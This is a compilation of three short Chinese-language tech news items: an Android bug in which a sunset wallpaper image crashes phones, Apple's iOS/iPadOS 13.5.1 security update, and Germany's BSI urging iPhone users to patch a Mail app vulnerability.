Android 出现了一个颇有美感的新 Bug。推特网友 Ice Universe 爆料称，当安卓手机用户将一张夕阳风光图片在安卓设备上作为壁纸使用时，会导致手机系统崩溃，屏幕出现无限闪烁。 受影响的设备主要包括三星、一加 和 Google Pixel 等智能手机。此外，该图像还导致了 Android 模拟器崩溃。 这张图片在社交媒体平台上广为流传，尽管已有示警，但还是有些用户无视警告将其设置为了壁纸。而该图像导致 Android 智能手机出现故障的原因则在于，它的颜色编码配置文件不正确，超出了 Android 的处理范围。 如果你已不幸中招，可以执行以下操作解决此故障： 尝试通过同时按下电源和增大音量按钮以安全模式启动智能手机。 如果你使用的是自定义 ROM，或者是卡在启动循环中的 rooted Android 设备，请将墙纸数据重置为默认值。 通过 bootloader 将设备恢复出厂设置，不过值得注意的是，在此过程中，所有数据都会丢失。 事实上，这也不是最近出现的唯一一个怪异 bug。上个月，还曾出现了一个仅仅是使用泰卢固语编写的一条短信，就导致了 iOS 设备崩溃的 bug。     （稿源：开源中国，封面源自网络。）

今天苹果发布了 iOS/iPadOS 13.5.1 以及 watchOS 6.2.6系统更新，对两周前发布的 iOS/iPadOS 13.5进行了安全修复。在安全更新日志中明确提及了 unc0ver 越狱使用的漏洞，因此想要越狱的用户尽量不要升级。 iOS/iPadOS 13.5.1本次更新的安装包容量为77.5MB，主要还是安全方面的改进，不过引入的新功能之一就是Apple Pay支持中国香港地区的八达通了。 此外watchOS 6.2.6更新容量为54.4MB，同样是重要的安全性更新，推荐用户尽快安装升级。从iOS 13.5.1、iPadOS 13.5.1和watchOS 6.3.6更新的补丁说明中可以看出，内容主要由安全更新组成。从版本号的增量也可以看出，它们的更新范围不大，功能和特性变化的可能性不大。     （稿源：cnBeta，封面源自网络。）

据外媒报道，德国联邦安全局(BSI)敦促iPhone用户尽快安装苹果发布的最新安全更新以解决邮件应用中存在的一个关键漏洞。据悉，这一安全漏洞由网络安全组织ZecOps发现，据信从3.1.3开始的所有版本的iOS操作系统都在受影响范围内。这意味着最新一代的iPhone也很容易受到攻击。 攻击者可以通过该漏洞访问用户邮件应用中的内容。 苹果已经在上周发布的iOS 13.5解决了这一漏洞，现在BSI希望每个人都尽快安装这个新版本。 BSI日前在更新的信息中写道：“苹果已经发布了iOS 12.4.7、iOS 13.5和iPadOS 13.5的安全更新，它们解决了所有受影响iOS版本的漏洞。由于漏洞的严重性，BSI建议立即将相应的安全更新应用于所有受影响的设备。iOS邮件应用在更新后可以再次使用。” 然而重要的是，尽管苹果承认存在这些问题，但这家公司表示，仅凭这些还不足具备访问邮件应用数据的能力。 据悉，想要安装iOS 13.5更新的用户可以前往设置>通用>软件更新，然后在安装完成后重启设备即可。     （稿源：cnBeta，封面源自网络。）